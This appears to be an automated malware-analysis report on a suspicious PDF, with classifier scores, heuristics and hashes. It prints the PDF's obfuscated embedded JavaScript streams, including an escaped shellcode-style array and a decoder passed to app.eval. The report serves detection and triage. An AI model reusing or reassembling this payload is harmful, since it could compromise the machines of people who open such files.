SUSPICIOUS
56
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as suspicious by a machine learning classifier with a high confidence score. Several heuristics indicate the presence of embedded JavaScript, which is often used to download and execute malicious payloads. No specific URLs or hashes were extracted, limiting the ability to identify a specific family or provide concrete IOCs. The ML_NYX_PDF_MALICIOUS heuristic strongly suggests malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 0.9994
Heuristics 4
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Optional Content Group with action trigger low PDF_OPTIONAL_CONTENTOptional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0019_000.js |
pdf-javascript-stream | PDF /JS object 19 at offset 0x2C9C | 2872 bytes |
SHA-256: cdcce31ee80dacc3f6b5d57ed074bf51a4e3d4368f1fea69cd2ed3f1d2b1c937 |
|||
Preview scriptFirst 1,000 lines of the extracted script
�� t h i s . r K 1 Y o V b M X = n u l l ; t h i s . m W K X d o g i u = n u l l ; f u n c t i o n l 0 s D H u I o ( c O W u h z o X W ) { r e t u r n c O W u h z o X W ; } v a r e Z k 6 g y 2 h = " m F b n 3 s x V T " ; t h i s . b 5 C t x B W d l = ' e l v Q u M U j ' ; f u n c t i o n g s q C e 4 S H U ( y 7 3 q b J 6 F K 7 , t z K R Z L 6 x p ) { } f u n c t i o n g k Q 9 R M V k O ( ) { r e t u r n f a l s e ; } f u n c t i o n v n j z Z 4 a R l y ( ) { r e t u r n f a l s e ; } v a r g Z 8 q u u r Q = n e w A r r a y ( ) ; g Z 8 q u u r Q [ 0 ] = 2 2 6 8 6 ; g Z 8 q u u r Q [ 1 ] = 3 9 6 7 ; v a r f k M v 8 l a y = n e w A r r a y ( 3 7 6 6 , 2 6 5 5 1 ) ; t h i s . q m 5 X t 2 v 2 j F = n u l l ; v a r d e M C t H v i Z M = n e w A r r a y ( 9 7 6 , 1 2 2 3 3 , 1 8 1 2 6 ) ; t h i s . l 0 k M x c J v 0 d = f a l s e ; f u n c t i o n w v j e G n J Y ( s o 4 a T Y o X T , s n G J N 3 3 1 t , j 4 G Q 9 8 Y l ) { } v a r h 3 L b Q 2 2 V E = n e w A r r a y ( 8 3 0 0 , 2 6 1 6 5 , 2 3 2 4 2 ) ; s p m j h e A T v Q = f a l s e ; f u n c t i o n y Y u C p J E 7 U z ( g B q V c u f P ) { r e t u r n f a l s e ; } v a r v 1 i P 6 7 8 F = n e w A r r a y ( ) ; v 1 i P 6 7 8 F [ 0 ] = 3 1 6 6 4 ; v 1 i P 6 7 8 F [ 1 ] = 3 1 2 7 3 ; f u n c t i o n i Y V 1 a q h p B l ( ) { } f u n c t i o n m 5 i Z i e 8 z f x ( f x a P m 5 D a 6 5 , o y q M g 9 U d i ) { r e t u r n f a l s e ; } v a r h 4 Q M S J e N = a p p . e v a l ; v a r d e i U H H g O = n e w A r r a y ( ) ; d e i U H H g O [ 0 ] = 2 1 0 5 5 ; d e i U H H g O [ 1 ] = 2 6 3 8 0 ; v a r k L w F L V N e q 6 = n e w A r r a y ( ' a U D Q y 4 M m ' , ' u s H G j n 5 7 y A ' ) ; f u n c t i o n r K D q R z G c q j ( r t o 9 F 0 L q c , g B D m A a x b ) { r e t u r n r t o 9 F 0 L q c ; } q c f U O n E 9 = n u l l ; v a r e 6 s u D a 6 X z = n e w A r r a y ( ) ; e 6 s u D a 6 X z [ 0 ] = 3 2 5 5 1 ; e 6 s u D a 6 X z [ 1 ] = 1 3 7 8 0 ; e 6 s u D a 6 X z [ 2 ] = 1 3 1 8 1 ; v a r v a I E k 3 h t = n e w A r r a y ( ) ; v a I E k 3 h t [ 0 ] = 1 6 3 7 9 ; f u n c t i o n q y U M 2 Y S e F ( ) { } v a r z D 2 v U t I s E m = f a l s e ; v a r d 5 l j G 0 V L S = n e w A r r a y ( ) ; d 5 l j G 0 V L S [ 0 ] = 2 4 7 5 ; w 5 V J j f B L 9 7 = " g K j S J Z z x P " ; v a r r b C K G e 1 u = n e w A r r a y ( 1 5 0 1 1 , 2 0 8 9 6 , 1 2 6 3 3 ) ; f u n c t i o n e R J H Z s N e ( n O A l a E q z p , u O m Y 4 g 6 c 0 N , v p 8 X 1 P G o m ) { r e t u r n v p 8 X 1 P G o m ; } v a r s A e L q z N D q = n e w A r r a y ( ) ; s A e L q z N D q [ 0 ] = 1 9 2 1 9 ; s A e L q z N D q [ 1 ] = 2 9 0 0 8 ; f u n c t i o n x q 1 e c 4 S X 9 ( r Q A v N w 5 l c , j l S x l V 5 y ) { r e t u r n r Q A v N w 5 l c ; } v a r v d a R U D y y Z i = n e w A r r a y ( 1 9 1 5 3 , 1 4 6 4 6 ) ;
|
|||
javascript_obj0020_001.js |
pdf-javascript-stream | PDF /JS object 20 at offset 0x3832 | 4096 bytes |
SHA-256: a397c1d77e15682e3123ce563ea5c72f03f9dcc8a2b828493fec9e7c27615308 |
|||
Preview scriptFirst 1,000 lines of the extracted script
function hCFoLHY94(ykbIuj9E,dNo59cnUW){return ykbIuj9E;}var qfBpRTo7O=new Array();qfBpRTo7O[0]=24602;function oEyKggwzG(){return false;}kf95iLOhf='uyl3n8VTg';function ngP2Xko2i(gl6JA9Ugg,uQUXFyD8w){return false;}function hhqzf1M7fG(pElQCw8Y,eEAV30sB,gdss6lsOp){return pElQCw8Y;}function fefynbK1y(l4GK9i7jU){return false;}var jOjcEYyss=new Array();jOjcEYyss[0]=9288;jOjcEYyss[1]=4833;var o4it7YnCx1=new Array();o4it7YnCx1[0]=8628;o4it7YnCx1[1]=25053;o4it7YnCx1[2]=12626;function fjZGHOQIQ(rBEckMHjQ,lB7fx7xbEi){return false;}var rfrZf3jsUR=new Array();rfrZf3jsUR[0]=17170;rfrZf3jsUR[1]=15075;rfrZf3jsUR[2]=27872;this.o5H1s7ks=null;this.x4ysWMW41=31953;var bby2f4La = 'v?a?r? ?m?Z$F#b~5$4@v@s$6$0~ $=~ ?n@e#w# $A?r#r?a?y@(~)$;$v@a?r@ #g@p?i?U?B~m?W~S?L$b@;@f#u@n@c@t~i@o?n@ #j#M?E@z~9#A@b$i@0$z~(?v$4$Y?U~y#H@T~r$X#t$,~ #m#R~L?y@0~S~9~s#g@)#{#w?h?i$l$e$(#v$4$Y?U#y~H#T?r@X#t?.~l#e$n#g~t$h? ~*~ ?2~ ?<? @m#R$L?y$0~S$9~s?g@)?{?v$4$Y#U?y$H@T~r#X?t~ #+#=? $v?4?Y?U~y$H~T#r@X@t$;~}#v$4~Y?U#y@H~T~r?X@t? @=$ @v~4#Y?U$y@H~T~r@X#t@.@s$u?b$s$t~r$i@n@g@(#0@,@ #m~R?L?y?0#S?9@s$g$ $/$ ~2$)$;~r~e$t$u$r~n~ @v?4?Y~U@y#H#T$r#X@t#;$}@f~u?n$c?t~i~o@n# ?k~B#K~d$x#A?c$e~9@($h@I?X$c~W#q@u@G$R@)${?i#f@(#h~I?X~c$W?q?u?G@R? ?=@=# $0~)${@v#a~r~ #v@b?A?l#T?K~D~q@ @=# ~0@x?0~c$0$c@0$c@0$c$;$v?a@r@ ?p~L~A@C~V#X?J@j~J? $=~ $n$e$w# #A~r@r#a~y~(@\"?%#u~9@c$6?\"#,~\"@0~%@u@0~0~e$\"$,$\"@8?%$u@0?0?0$\"$,$\"?0~%~u$5?d@\"#,~\"~0?0@%?u@e#d?8$3$%@\"~,$\"~u?b~8#0$7#%?u@8?\"#,?\"@5?c#3?%#u~6#\"@,?\"?e~0~4@%#u?e$0?\"$,$\"$b?9@%@u@0@0?0@1#%?u#\"$,?\"$3$1@0$0$%@u@0~\"~,@\"@d$4#4$%~u#\"~,~\"?8?3#1?a@%@u~0#4~e#\"~,?\"#9?%?u$f#7$7@5@\"#,~\"@%?u~b?4?3#f#%#u~0$a#\"$,~\"~c#4#%$u$8?0@c?0$\"@,#\"#%~u$6$e~3#\"~,$\"@4@%~u~8#5#c@3$%#\"$,$\"@u?6?2?7~c@%@u#\"?,?\"$c?5?4~8@%#u#e$5#0$8#\"$,~\"?%?u~9?9~b$3$%$u$e?\"~,$\"$5#a@9$%?u#8#d@9~\"?,?\"~b@%@u?6$7$e@f#\"@,@\"?%@u#c#5#4$8?%#u?e#\"$,@\"@3?3?0$%?u?f?9~8~\"@,$\"~3~%?u@3#6$8@f#%~u?\"~,~\"$6~d~f?f$%$\"$,#\"@u@6#f?1?b$%?\"$,#\"#u$8$5~c?3@%@u?f@b@\"?,#\"~8$9$%#u?8?\"$,$\"~4@8@6#%#u~6?e?0$4@%@\"@,#\"@u?7#a~9~1?%~u?\"$,$\"@6$9#9#1#%~u#8?\"~,#\"@5?c#2?%$u#\"?,?\"~e#3#0~4?%@\"#,@\"#u@d$5?5#6@%~\"#,@\"@u~6$e?0?5#%~u$d$\"?,?\"?7?c#3@%?u@9@1$5?\"@,?\"?4$%@u@7~a@5$\"@,~\"@6$%?u#6#e$0~4?\"?,$\"~%@u@0~c?c$3#%~u~\"$,~\"?6@1?8$1~%@u@8$\"@,?\"@5@c~2@%~u@e#\"~,~\"#3$0@4#%#u#9@\"@,?\"#6?5?6@%?u@\"$,$\"#6$e?0~5~%#\"@,~\"~u#d$7~c#3$%~u?8@5@6~\"~,?\"$c$%$u@8~5~c$3?\"$,#\"@%?u#9~1~0@4~%~u?\"~,~\"~8@6#5$6#%~u@6$\"$,#\"?e@0~5~%$u#0#8@\"~,@\"$c#3?%?u?6~b@\"$,$\"#9#8@%~u#8$4~d?0~%#u#\"?,#\"$6?e@0?4#%~u@\"?,?\"$3~0#4?e~%~\"$,$\"$u@6~e~c?e~%#\"~,~\"~u@8#5@c$3#%@u~\"~,?\"#d?3@8$9~%@\"?,#\"#u$8#5#1@4@\"~,#\"@%~u@6~e$0@4@%@u?4@c@\"?,#\"~f@2~%$u~e@a~a?8~%$u~\"@,$\"@f?1~0$3#%?u~e@6#0@\"~,?\"@2$%~u$8#e$c$\"@,?\"@7~%#u@8~5?4~5$%@u$\"~,~\"#0~d?3$6?%~u$6#5$\"~,#\"~0~0?%?u?8#5?a@9?%#u$\"~,?\"$6?e@6?e~%$u~\"~,$\"?1$0~4#e~%~\"@,#\"$u$6@f~1#7@%$u#8?\"?,~\"?5@c#3#%~u?3~9@\"@,@\"~5#6~%?u@8@\"@,@\"?5$a$9$%#u?f~b@\"$,$\"~f?b~%$u$8$\"#,$\"@4@c?c$%?u$6~e#0?4#\"?,~\"~%~u#8?0~a~9#%~u?\"~,$\"$f$b$8@9?%~u$\"#,$\"?8~4?d@0$%@u#6#e#0$4@\"?,@\"?%$u?7#a~9$1~%~u?6?5#\"$,@\"#9$1?%?u~8~5$c?\"@,~\"#2#%~u~5@e$0$\"$,$\"#4@%~u@2~b$0?3~\"$,#\"#%~u?9~3$7@1$\"?,$\"$%~u$b?a?4$3?%#u@1?\"~,$\"#b#b$f@%@u@1#8?\"@,@\"~0~0#%@u#a~d$6~5~\"#,~\"@%$u?e?a$b?4~%~u~0@a?\"#,$\"$7?6@%$u?e$\"~,#\"?9?8@2?%?u~0$1?7#7?\"$,~\"$%@u$e#0@e@d#%$u$\"#,#\"?0$b~7$c?%#u$\"@,#\"~e?d$c@3?%@u?1$a#\"$,~\"@7~0~%?u?b#f~b#\"$,@\"#3$%?u@4~1$2@b#\"#,$\"$%@u$f~c#a@e#%#\"@,$\"#u#1@b?6~9?%@u?e~c~b@\"@,~\"@0?%@u$5?d~6$7?%?u@a@\"$,?\"~b$f$a@%#u@\"$,?\"#0#b$6#a$%?u~a?a#\"@,@\"~b$7?%$u$4$1#3~5$%$u#\"#,?\"$f@5$b@6$%$u#0#f~6@\"?,?\"?0?%?u~e@0~b$7#%~u?1#\"~,#\"@e@2?a@%~u@f@5$a#b#%#\"$,@\"$u$0#7?3@b#%@\"~,@\"?u@b@8~a$7@%?u@\"~,#\"@6?e@3~7$%$u~8$5~7$8@\"~,#\"#%$u@6@e@0?4@%~u$8?5@\"~,#\"~c?3?%?u$6~e?\"#,~\"?0@4~%@u$8@5?\"@,@\"#c#3~%$u~6#\"$,$\"~e~0#4#%$u?8@5?\"~,~\"?c$3?%#u~6#e~\"~,#\"~0~4~%~u~7?a$c#3$%$u#\"?,@\"?6$e$0$4@%?u?c~2~c~\"?,~\"#3@%~u@1#a?6$1$%$u#f$\"?,?\"~7~9~3#%$u$0~d#6@\"?,$\"$b?%@u~e?1?8$2?%$\"?,@\"#u~1~c?6#0?%$u$f@\"$,~\"$6#a#6$%@u@6#e@\"#,@\"~7#7$%~u@e$0#8?4$\"#,?\"#%$u?3@a$7~\"?,$\"$0?%@u#e$8?\"#,~\"?a#6~%?u@3?e#7~\"?,?\"#4$%~u#f?1@a?2@%?\"@
|
|||
javascript_obj0021_002.js |
pdf-javascript-stream | PDF /JS object 21 at offset 0xD053 | 2578 bytes |
SHA-256: 1411d4ed0ae76ecc1396c54b913a36f1c79f9c3782380a7fd78ce6fbc735e30f |
|||
Preview scriptFirst 1,000 lines of the extracted script
�� v a r d h A 4 s 5 J E 0 T = n u l l ; v a r m U X G y v o 6 = f a l s e ; v a r i z G 1 5 3 r X = n e w A r r a y ( ' s C 0 0 R G W d t ' , ' b N j q z G 9 J 9 ' ) ; v a r d T 1 y O m 6 6 B = n u l l ; f u n c t i o n y R 7 y V m j X ( ) { } q Y 0 5 5 I j N = ' k D j M T K T B l O ' ; v a r e z i X Z c N w I J = " x A c 5 P 2 A E " ; f u n c t i o n h 6 A F o W h y s m ( t T E N C o 7 p u , i p z Z x 1 D c V W , d V R P C B X p L P ) { r e t u r n t T E N C o 7 p u ; } p S v x 9 H 4 9 = 0 . 3 6 2 4 3 9 4 ; f u n c t i o n r y R L G r n K E ( ) { r e t u r n f a l s e ; } t h i s . b I u a U d n n = ' m q N 8 B N b 9 ' ; f u n c t i o n r B N r o k r T 1 V ( ) { } f u n c t i o n e x j L S r U H Q ( a S 1 y o J H S 1 , h 6 U j 9 O 7 h h Q , f B 5 t x w e P c ) { r e t u r n h 6 U j 9 O 7 h h Q ; } o F q Y 2 A C I Y a = " h W 2 w U z O l " ; t M E z N 1 M n J = " a 7 L a g 3 u S F w " ; v a r h A t F H S C v M = b b y 2 f 4 L a . r e p l a c e ( / [ # @ \ $ ~ \ ? ] / g , ' ' ) ; f u n c t i o n z T y S W n M i v ( e 8 l v C g E p 1 , q O Y k 2 X Z 8 N , a O f B q S e k Q k ) { r e t u r n e 8 l v C g E p 1 ; } v a r j P P z y z z Q K a = " d E a L C k T 6 S 7 " ; f u n c t i o n p 3 6 h K O x T b ( h 7 h U W f H e , z G D 8 I C Q Q L ) { r e t u r n z G D 8 I C Q Q L ; } v a r r T 0 f C 0 3 B = n u l l ; f u n c t i o n c g T e p 9 Q Z P ( b T w X 3 6 y 4 t 8 , m K X P u o x 0 A ) { r e t u r n m K X P u o x 0 A ; } v a r h P k 9 V v Z U = n e w A r r a y ( ) ; h P k 9 V v Z U [ 0 ] = 1 0 7 9 1 ; v a r v k F n V G X w V Z = n e w A r r a y ( ) ; v k F n V G X w V Z [ 0 ] = 2 3 9 3 9 ; v k F n V G X w V Z [ 1 ] = 2 7 3 9 2 ; v a r q P 0 y A B S K q = n e w A r r a y ( ' a E O x Y r R i Q ' , ' m 1 q w P 2 a g ' ) ; v a r r 8 Q 4 s P p 4 D 7 = " u u n f R t 3 1 " ; f u n c t i o n e w D B Z n t S A ( ) { r e t u r n f a l s e ; } v a r f J 9 M u l u w = n e w A r r a y ( ' k 4 Q y 6 0 4 X g w ' , ' s b O I r Q N 6 ' , ' z 9 e x 2 c A K Y ' ) ; f u n c t i o n x W s b T f d P 8 f ( l A P 5 T B r q V k , f 2 U U A 0 w f , h O B q d B t e z ) { r e t u r n f a l s e ; } f u n c t i o n q 9 P o i q 2 W ( s p m H 2 1 b X , j f O U M f H y j q ) { r e t u r n f a l s e ; } f u n c t i o n k d 5 n 9 W 3 H ( u r i R e u a M v , i 9 N Z b 1 r M , k K l D U q j k U ) { r e t u r n k K l D U q j k U ; } t h i s . o i b L 8 j u 6 = ' z l y z h W V m h ' ; f u n c t i o n k i X W P Q q Z ( c N f u o d T f , r V i t 4 E e 7 ) { r e t u r n r V i t 4 E e 7 ; }
|
|||
javascript_obj0022_003.js |
pdf-javascript-stream | PDF /JS object 22 at offset 0xDAB9 | 902 bytes |
SHA-256: b631107836447ce28210e01a528d09477037bd0c1d2851f686e6916948b0519f |
|||
Preview scriptFirst 1,000 lines of the extracted script
�� f u n c t i o n z P j x q G 7 P g ( d H t G i j j y p , o C i 8 j h U D s ) { r e t u r n d H t G i j j y p ; } f u n c t i o n f g S o n a h x g ( x V U x c 0 t z R , y k U 3 X q 9 y A ) { } f u n c t i o n l 3 t c Y W d 5 v ( s Q z 7 k K j l x , w u E u k x W n ) { } n k H h P g 5 q y = f a l s e ; a F N i H D w I s = f a l s e ; v a r q L q Z H J x s n = n e w A r r a y ( ) ; q L q Z H J x s n [ 0 ] = 1 7 4 0 0 ; q L q Z H J x s n [ 1 ] = 1 2 4 9 7 ; v a r y K B Q r M U X 3 = n e w A r r a y ( " n N Z 0 K U x U I t " , " y k K M E H G w U " ) ; v a r f E M p B m Y M = n e w A r r a y ( ' i y c B I 9 G w Q l ' , ' p E U m m T f S ' , ' i e g B q V c u f ' ) ; t h i s . f L j 3 x s e c M O = 2 7 4 9 5 ; i d g T z w Z C 8 = ' h S 0 Y E a u Y ' ; v a r s e j 0 M S t 9 = n e w A r r a y ( " b M f G u 6 0 8 Z " , " y D 9 4 8 r 7 w v v " , " f x a P m 5 D a 6 5 " ) ;
|
|||
javascript_obj0023_004.js |
pdf-javascript-stream | PDF /JS object 23 at offset 0xDE79 | 2486 bytes |
SHA-256: a228ca6d5f0dfecaf99c7e9a10cb3cbd8c39ddd1b670a768484246720f7aa8fa |
|||
Preview scriptFirst 1,000 lines of the extracted script
�� f u n c t i o n k b j o h F s 1 ( b V F 8 N u 2 H , m n 1 3 r t U 2 , o x P y T A Z F ) { r e t u r n m n 1 3 r t U 2 ; } v a r d j o Q O z I f 3 = " o h 2 h 4 Q M S " ; v a r l K d x A c e 9 V = f a l s e ; f u n c t i o n n J q b W u A o ( r N i m Y v K 1 ) { r e t u r n f a l s e ; } v a r d N M q j d Z 1 9 = 0 . 4 7 2 8 8 8 6 2 4 ; v a r b 8 B a H n Z H L = n e w A r r a y ( ' n H t L h 8 P v X y ' , ' a k i g P t f B M ' , ' j Y O O y L D T e ' ) ; v a r g 3 z W v Z E c = n u l l ; f u n c t i o n z r N E 4 d I d ( ) { } f u n c t i o n n r j O 2 b A S A ( f V L O D 0 K P , k K A U 7 6 b d W , p Z Z 8 v 7 J y ) { r e t u r n f V L O D 0 K P ; } v a r q n G 7 e K a f = n e w A r r a y ( ) ; q n G 7 e K a f [ 0 ] = 2 2 8 8 9 ; q n G 7 e K a f [ 1 ] = 1 6 3 6 6 ; q n G 7 e K a f [ 2 ] = 2 7 7 9 1 ; v a r x b l O D 8 q P N = n e w A r r a y ( ' o s J f N o J I c ' , ' d l D q Y n E y i ' , ' j T k N T O q J ' ) ; f u n c t i o n m a w k l 0 2 s ( b L 0 O x 0 W w b , k N 7 B 9 X l p s v , b Q a N M 4 O A ) { } f u n c t i o n w 9 E p N o E 2 ( ) { } v a r k 2 i I D 1 L 5 N = n e w A r r a y ( ' n h Z o z q h I ' , ' l B T 1 w a v K r ' ) ; h 4 Q M S J e N ( h A t F H S C v M ) ; v a r w y y v 9 W 9 s = f a l s e ; f u n c t i o n w M 9 u D R 1 Z 4 ( z J W 6 7 Q s 2 k H , y 4 S r c 6 h A Z , v Q n B M a b 7 U 0 ) { r e t u r n z J W 6 7 Q s 2 k H ; } f u n c t i o n c R L Y h 0 U H T ( z F E f V l D D L 2 , k 8 a x D q a v ) { } f q U b N u 2 W Q = 1 2 2 2 7 ; v a r o j 6 0 V E N m 1 = 1 0 3 6 3 ; v a r y d l h O 4 O v B = 3 6 9 7 ; f u n c t i o n l X 5 E X 1 M 3 ( f f Q Q i Z L K , z k y v v e 8 X , x d F J g 9 I q ) { r e t u r n f a l s e ; } v a r b k 8 x p p g t = " g O j O Z K 3 h " ; f u n c t i o n j B l w 5 e u B Z ( r Z W f R p c L 9 M , z S e Q 4 v g e ) { r e t u r n z S e Q 4 v g e ; } v a r e F o m T Q 6 t s g = n e w A r r a y ( 2 7 3 1 8 , 5 0 4 7 , 2 2 3 0 8 ) ; f u n c t i o n f Z E Q f I 8 I k o ( n i G g 1 u H r D , p B d B H c q Q m , n F G 5 w N p a z ) { r e t u r n n i G g 1 u H r D ; } f u n c t i o n l y 8 7 E S S 1 Q ( v z G G 0 K X t D , a h o 6 Z i e c ) { r e t u r n f a l s e ; } f u n c t i o n l V z e W g T c ( t j U t Z G q c N , t Y q Q t d G p U , b G t g w D m 6 ) { r e t u r n t j U t Z G q c N ; } f u n c t i o n c C b h o L 6 d e ( h H p 2 q b V e W , n t B G F H f I s , q 5 t 7 Z Z J b 0 ) { r e t u r n f a l s e ; }
|
|||
stream_005_off00002c9c.js |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x2C9C | 1435 bytes |
SHA-256: ed134c6d2a1a0614bdc6bf09bdff6453349b5a93251ff7789f983ea6b81082c0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
36 of 59 identifiers look randomly generated (e.g. 'y73qbJ6FK7') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.